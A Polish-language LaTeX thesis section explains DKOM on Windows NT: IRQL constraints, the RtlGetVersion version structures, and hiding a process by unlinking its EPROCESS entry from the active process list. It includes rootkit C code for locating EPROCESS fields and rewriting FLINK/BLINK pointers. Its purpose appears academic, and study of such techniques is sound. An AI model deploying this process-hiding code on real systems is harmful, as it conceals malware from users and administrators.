Metodologia DKOM\cite[p.169]{ghoglund06}\cite{butler} (ang. Direct Kernel Object Manipulation) polega na bezpośrednich manipulacjach na obiektach jądra. W klasycznym podejściu do modyfikacji obiektów jądra wymaga się zastosowania menedżera obiektów, który jest podsystemem egzekutora. Podsystem ten udostępnia wspólne operacje dla wszystkich obiektów, z których najważniejszymi są:
\begin{itemize}
	\item tworzenie obiektów,
	\item ochrona obiektów,
	\item usuwanie obiektów.
\end{itemize}
Wykorzystanie metodologii DKOM pozwala ma pominięcie menedżera obiektów podczas modyfikacji obiektów jądra, co pozwala skutecznie ominąć zabezpieczenia takich obiektów. \\ 

Metodologia DKOM jest z powodzeniem wykorzystywana celu:

\begin{itemize}
	\item \textbf{ukrywania plików},
	\item ukrywania sterowników,
	\item ukrywania portów,
	\item zmiany poziomu uprzywilejowania wątku wraz z powiązanym procesem.
\end{itemize}

Bezpośrednie manipulacje na obiektach jądra, jak każda metodologia, posiada wady i zalety. Trudności w wykryciu przeprowadzanych operacji oraz skuteczność w modyfikowaniu obiektów jądra należą do niewątpliwych zalet tej metodologi. Z drugiej strony wymaga określenia pewnych właściwości modyfikowanego obiektu, np.:

\begin{itemize}
	\item Jakie elementy składają się na strukturę obiektu?
\end{itemize} 

W celu zapoznania się ze strukturami poszczególnych obiektów warto skorzystać z narzędzia \textbf{WinDbg}, który pozwala na wyświetlenie informacji o elementach obiektu. Aplikacja \textbf{WinDbg} wraz ze sposobem korzystania zostanie opisana w sposób bardziej szczegółowy w dalszej części pracy.

\begin{itemize}
	\item W jaki sposób jądro korzysta z obiektu?
\end{itemize}

W celu skutecznie przeprowadzonej modyfikacji jądra, wymagane jest dokładne poznanie sposobu wykorzystania danego obiektu przez jądro. W przeciwnym wypadku można przyjąć wiele nieprawidłowych założeń. Rozwiązaniem tego problemu jest szczegółowy i jednoznaczny opis wykorzystania danego obiektu przez jądro systemu. 

\begin{itemize}
	\item  W jakim stanie znajduje się maszyna oraz system operacyjny podczas wykorzystania wybranych obiektów.
\end{itemize}

Informacje na temat stanu maszyny oraz systemu operacyjnego są kluczowe z punktu widzenia twórcy oprogramowywania wykorzystującego DKOM. Wynika to z faktu, że na 
różnych poziomach obsługi przerwań IRQL (ang. Interrupt Request Level) pewne obszary pamięci czy funkcje mogą być dla nas niedostępne. Przykładowo, jeśli wątek pracuje na poziomie DISPATCH\_LEVEL IRQL, to nie może on korzystać z obszarów pamięci, których modyfikacja spowodowałaby błąd strony\footnote{\url{http://www.osronline.com/article.cfm?article=222}} w jądrze.\cite[p.171]{ghoglund06}

\subsubsection{Określenie wersji systemu operacyjnego}

Wykorzystywane przez jądro struktury zmieniają się w poszczególnych wersjach systemu operacyjne, czasem również zdarza się zmiana po wydaniu pakietu poprawek. Podczas projektowania aplikacji twórca powinien dokładnie znać wersję systemu na które aplikacja będzie wykorzystywana. Zważywszy na fakt, że tworzona aplikacja będzie działać w warstwie jądra, zasadna wydaje się potrzeba określenia wersji systemu operacyjnego poprzez operacje wykonywane w warstwie jądra.\\

W systemach operacyjnych z rodziny Windows NT, zaczynając od wersji Windows 2000, powinno się korzystać z funkcji \textit{RtlGetVersion}\footnote{\url{http://msdn.microsoft.com/en-us/library/windows/hardware/ff561910.aspx}} będącej częścią interfejsu Win32.
Wspomniana funkcja pobiera jako parametr wskaźnik na strukturę RTL\_OSVERSIONINFOW\footnote{\url{http://msdn.microsoft.com/en-us/library/windows/hardware/ff563624.aspx}} lub RTL\_OSVERSIONINFOEXW\footnote{\url{http://msdn.microsoft.com/en-us/library/windows/hardware/ff563620.aspx}}, w których znajdują się informacje o aktualnie uruchomionej wersji systemu operacyjnego.

Poniżej przedstawiono kod opisywanej funkcji: 
\begin{lstlisting}
NTSTATUS RtlGetVersion(
  _Out_  PRTL_OSVERSIONINFOW lpVersionInformation
);
\end{lstlisting}
Poniżej przedstawiono zawartość struktur RTL\_OSVERSIONINFOW, \\ RTL\_OSVERSIONINFOEXW wraz z opisem zawracanych przez nie informacji.
\begin{lstlisting}
typedef struct _OSVERSIONINFOW {
  ULONG dwOSVersionInfoSize; 
  ULONG dwMajorVersion; 
  ULONG dwMinorVersion; 
  ULONG dwBuildNumber; 
  ULONG dwPlatformId;  
  WCHAR szCSDVersion[128]; 
} RTL_OSVERSIONINFOW, *PRTL_OSVERSIONINFOW;
\end{lstlisting}

\begin{itemize}
	\item ULONG dwOSVersionInfoSize - rozmiar struktury RTL\_OSVERSIONINFOW w bajtach.
	\item ULONG dwMajorVersion - główny numer wersji systemu operacyjnego, Dla systemu Windows 7 wynosi on 6.
 	\item ULONG dwMinorVersion - drugorzędny numer wersji systemu operacyjnego. Dla systemu Windows 7 wynosi on 1.
  	\item ULONG dwBuildNumber - numer kompilacji systemu operacyjnego.
  	\item ULONG dwPlatformId - ID platformy systemu operacyjnego, dla 32-bitowych systemów operacyjnych opartych o architekturę NT, RtlGetVersion zwraca wartość VER\_PLATFORM\_WIN32\_NT.
  	\item WCHAR szCSDVersion[128] -  przechowuje nazwę aktualnie zainstalowanego pakietu uaktualnień (ang. Service pack). W przypadku gdy nie jest zainstalowany żaden Service Pack, RtlGetVersion zwraca zero.
\end{itemize}

\begin{lstlisting}
typedef struct _OSVERSIONINFOEXW {
  ULONG  dwOSVersionInfoSize;
  ULONG  dwMajorVersion;
  ULONG  dwMinorVersion;
  ULONG  dwBuildNumber;
  ULONG  dwPlatformId;
  WCHAR  szCSDVersion[128];
  USHORT wServicePackMajor;
  USHORT wServicePackMinor;
  USHORT wSuiteMask;
  UCHAR  wProductType;
  UCHAR  wReserved;
} RTL_OSVERSIONINFOEXW, *PRTL_OSVERSIONINFOEXW;
\end{lstlisting}

\begin{itemize}	
	\item ULONG dwOSVersionInfoSize - rozmiar struktury RTL\_OSVERSIONINFOEXW w bajtach.
	\item ULONG dwMajorVersion - główny numer wersji systemu operacyjnego, Dla systemu Windows 7 wynosi on 6.
 	\item ULONG dwMinorVersion - drugorzędny numer wersji systemu operacyjnego. Dla systemu Windows 7 wynosi on 1.
  	\item ULONG dwBuildNumber - numer kompilacji systemu operacyjnego.
  	\item ULONG dwPlatformId - ID platformy systemu operacyjnego, dla 32-bitowych systemów operacyjnych opartych o architekturę NT, RtlGetVersion zwraca wartość VER\_PLATFORM\_WIN32\_NT.
  	\item WCHAR szCSDVersion[128] -  przechowuje nazwę aktualnie zainstalowanego pakietu uaktualnień (ang. Service pack). W przypadku gdy nie jest zainstalowany żaden Service Pack, RtlGetVersion zwraca zero.
  	\item USHORT wServicePackMajor - główny numer wersji najnowszego dodatku Service Pack zainstalowanego w systemie. Dla dodatku Service Pack 3, główny numer wersji jest trzy. Jeśli nie został zainstalowany dodatek Service Pack, wartość jest równa zero.
  	\item USHORT wServicePackMinor - Drugorzędny numer wersji najnowszego dodatku Service Pack zainstalowanego w systemie. Dla dodatku Service Pack 3, drugorzędny numer wersji jest zero.
  	\item USHORT wSuiteMask - sprawdza dostępność wybranych komponentów\footnote{\url{http://msdn.microsoft.com/en-us/library/windows/hardware/ff563620.aspx}} na zainstalowanym systemie operacyjnym. Zwraca wartości 0 lub 1 zgodnie z działaniem operacji logicznej OR.
  	\item UCHAR  wProductType - zawiera dodatkowe informacje\footnote{\url{http://msdn.microsoft.com/en-us/library/windows/hardware/ff563620.aspx}} na temat systemu.
  	\item UCHAR  wReserved	- obszar zarezerwowany przez Microsoft w celu użycia go w przyszłości.
\end{itemize}

Po zapoznaniu się z numerem wersji systemu operacyjnego możemy przystąpić do ukrywania plików wykorzystując bezpośrednie manipulacje na obiektach jądra. 

\subsubsection{Ukrywanie procesów z wykorzystaniem DKOM}

W systemach z rodziny Windows NT przechowują w pamięci obiekty opisujące procesy i wątki działające w systemie operacyjnym. Program Task Manager wykorzystuje te obiekty w celu wypisania listy działających procesów na danej maszynie. Funkcja \textit{ZwQuerySystemInformation} tworzy listę procesów na podstawie opisujących je obiektów. Poznając dokładnie te obiekty, a następnie odpowiednio je modyfikując możliwe będzie skuteczne ukrywanie procesów. Lista aktywnych procesów w systemach operacyjnych Windows tworzona jest z wykorzystaniem listy dwukierunkowej opisywanej w strukturze EPROCESS. W EPROCESS trzeba zwrócić uwagę na kolejną strukturę, a mianowicie na LIST\_ENTRY. Struktura ta zawiera dwa pola FLINK oraz BLINK. Pola te są wskaźnikami następnego i poprzedniego procesu w stosunku do bieżącego obiektu opisującego proces. \\

W celu ukrycia procesów w systemach z rodziny Windows NT, wymagane jest dokładne zapoznanie się ze strukturą EPROCESS oraz co ważniejsze odnalezienie tej struktury w pamięci. EPORCESS zmienia się w prawie każdej wersji systemu. Istnieje możliwość odczytania wskaźnika bieżącego procesu i jego struktury za pomocą funkcji \textit{IoGetCurrentProcess}. W tym celu funkcja \textit{IoGetCurrentProcess} zostaje poddana deasemblacji, w wyniku czego otrzymujemy:

\begin{lstlisting}
	mox eax, fs:0x00000124;
	mov eax, [eax + 0x44];
	ret
\end{lstlisting}

Przestawiony kod składa się z dwóch instrukcji \textit{mov} oraz instrukcji powrotu. Działanie tego kodu związane jest z wykorzystywaniem bloku KPRCB (ang. Kernel's Processor Control Block) w systemach Windows. Blok ten zawsze znajduje się w pamięci jądra po adresem 0xffdff120. Funkcja \textit{IoGetCurrentProcess} w postaci kodu assemblerowego odczytuje adres przesunięty o 124 bajty za adres wskazywany przez rejestr fs. Odczytana wartość jest adresem bieżącej struktury ETHREAD, z której odczytywany jest wskaźnik do struktury KTHREAD. Z niej natomiast odczytujemy wskaźnik na strukturę EPROCESS bieżącego procesu. Wykonując poprzednie kroki otrzymujemy możliwość przeglądania listy dwukierunkowej łączącą struktury EPROCESS aż do momentu odnalezienia procesu, który chcemy ukryć.\cite[p.179]{ghoglund06} 

\begin{figure}[h]
	\centering
		\includegraphics[scale=0.6]{img/kprcb.jpg}
	\caption{Ścieżka od bloku KPRCB do listy procesów.}\cite[p.15]{butler} 
\end{figure}
\FloatBarrier

W ramach metodologi DKOM istnieją dwa sposoby odnajdowania procesów, a następnie ich ukrywania. Pierwszym ze sposobów jest wykorzystanie identyfikatora procesu PID (ang. Process ID). PID zapisany jest w strukturze EPROCESS pod przesunięciem, które w każdej wersji systemu operacyjnego jest inne. Fakt ten znacząco obniża popularność tej metody. Częściej stosowaną metodą odnajdowania i ukrywania procesu jest wykorzystanie nazw procesów. Ze struktury EPROCESS odczytywana jest nazwa procesu,która zapisana jest w postaci tablicy znaków. W celu znalezienia nazwy procesu w strukturze EPROCESS należy stworzyć funkcję, która w wyniku wywołania będzie zwracać przesunięcie nazwy procesu w ramach struktury EPROCESS. Funkcja GetLocationOfProcessName() przeszukuje pamięci zajmowaną przez strukturę EPROCESS bieżącego procesu, w celu odnalezienia słowa kluczowego ,,System''. Po jego odnalezieniu funkcja zwraca odpowiednią wartość przesunięcia. Poniżej przedstawiono przykładowy kod\cite[p.181]{ghoglund06} opisywanej funkcji:
\begin{lstlisting}
ULONG GetLocationOfProcessName()
{
ULONG ul_offset;
PEPROCESS CurrentProc = PsGetCurrentProcess();
// This will fail if the EPROCESS grows larger than a page size.
for(ul_offset = 0; ul_offset < PAGE_SIZE; ul_offset++)
{
	if(!strncmp( "System", (PCHAR) CurrentProc +
					 ul_offset,strlen("System")))
	{				
		return ul_offset;
	}
}
 return (ULONG) 0;
}
\end{lstlisting}

Odczytując odpowiednie przesunięcie dla nazwy procesu, można przystąpić do stworzenia funkcji(FindProcessEPROC) która będzie szukała odpowiedniej nazwy procesu do ukrycia. 
Należy jednocześnie pamiętać, że nazwy procesów nie są unikalne. Nazwa zapisana jest w postaci szesnastoznakowego ciągu znaków w strukturze EPROCESS, a dokładniej w pierwszych szesnastu znakach pliku wykonywalnego zawierającego kod programu. \\

Kolejnym krokiem podczas ukrywania procesu jest zmodyfikowanie wartości wskaźników FLINK oraz BLINK poprzedniego oraz następnego procesu, w celu pominięcia struktury EPROCESS ukrywanego procesu. W polu FLINK poprzedniego procesu należy wpisać wartość pola FLINK ukrywanego procesu. Podobnie rzecz ma się z polem BLINK, gdzie to tegoż pola znajdującego się w następnym procesie od procesu ukrywanego wpisać należy wartość pola BLINK procesu ukrywanego.

Podczas niszczenia procesu wymagana jest aktualizacja opisującej działające procesy listy dwukierunkowej. Operacja ta może powodować modyfikacje wartości pól BLINK i FLINK znajdujących się przed i za zakończonym procesem. Wynikiem tej operacji może być fakt wskazywania przez wartości wskaźników pól BLINK i FLINK nieistniejących już struktur. W celu rozwiązania tego problemu należy zapisać w strukturze EPROCESS wskaźnik na nią samą. Takie rozwiązanie sprawi, że po zniszczeniu procesu wskaźniki pól BLINK i FLINK zawsze będą posiadały prawidłowe wartości.

Poniższy schemat przestawia wygląd listy aktywnych procesów po ukryciu wybranego procesu.

\begin{figure}[ht]
	\centering
		\includegraphics[scale=0.5]{img/blink.jpg}
	\caption{Lista aktywnych procesów po ukryciu wybranego procesu.}\cite[p.19]{butler} 
\end{figure}
\FloatBarrier

Powyżej opisane wymagania można przedstawić w postaci przykładowego kodu\cite[p.180,182]{ghoglund06}:
\begin{lstlisting}
\\Funkcja zwracajaca adres struktury EPROCESS szukanego procesu.
DWORD FindProcessEPROC (int terminate_PID)   
{   
    DWORD eproc       = 0x00000000;    
    int   current_PID = 0;   
    int   start_PID   = 0;    
    int   i_count     = 0;   
    PLIST_ENTRY plist_active_procs;   
   
    if (terminate_PID == 0)   
        return terminate_PID; 
          
    eproc = (DWORD) PsGetCurrentProcess();   
    start_PID = *((DWORD*)(eproc+g_PIDOFFSET));   
    current_PID = start_PID;   
   
    while(1)   
    {   
        if(terminate_PID == current_PID)   
            return eproc;   
        else if((i_count >= 1) && (start_PID == current_PID))   
        {   
            return 0x00000000;   
        }   
        else {   
            plist_active_procs = (LIST_ENTRY *) (eproc+g_FLINKOFFSET);   
            eproc = (DWORD) plist_active_procs->Flink;   
            eproc = eproc - g_FLINKOFFSET;   
            current_PID = *((int *)(eproc+g_PIDOFFSET));   
            i_count++;   
        }   
    }   
}   
	DWORD eproc = 0;
	PLIST_ENTRY plist_active_procs;
	// Find the EPROCESS to hide.
	eproc = FindProcessEPROC (PID_TO_HIDE);
	
	if (eproc == 0x00000000)
		return STATUS_INVALID_PARAMETER;
		plist_active_procs = (LIST_ENTRY *)(eproc+FLINKOFFSET);
	*((DWORD *)plist_active_procs->Blink) =(DWORD) plist_active_procs->Flink;
	*((DWORD *)plist_active_procs->Flink+1) =(DWORD) plist_active_procs->Blink;
	plist_active_procs->Flink = (LIST_ENTRY *)&(plist_active_procs->Flink);
	plist_active_procs->Blink = (LIST_ENTRY *)&(plist_active_procs->Flink);
\end{lstlisting}

Po poprawny wykonaniu wcześniejszych operacji otrzymujemy wymagającą lecz skuteczną metodę ukrywania wybranych procesów. 

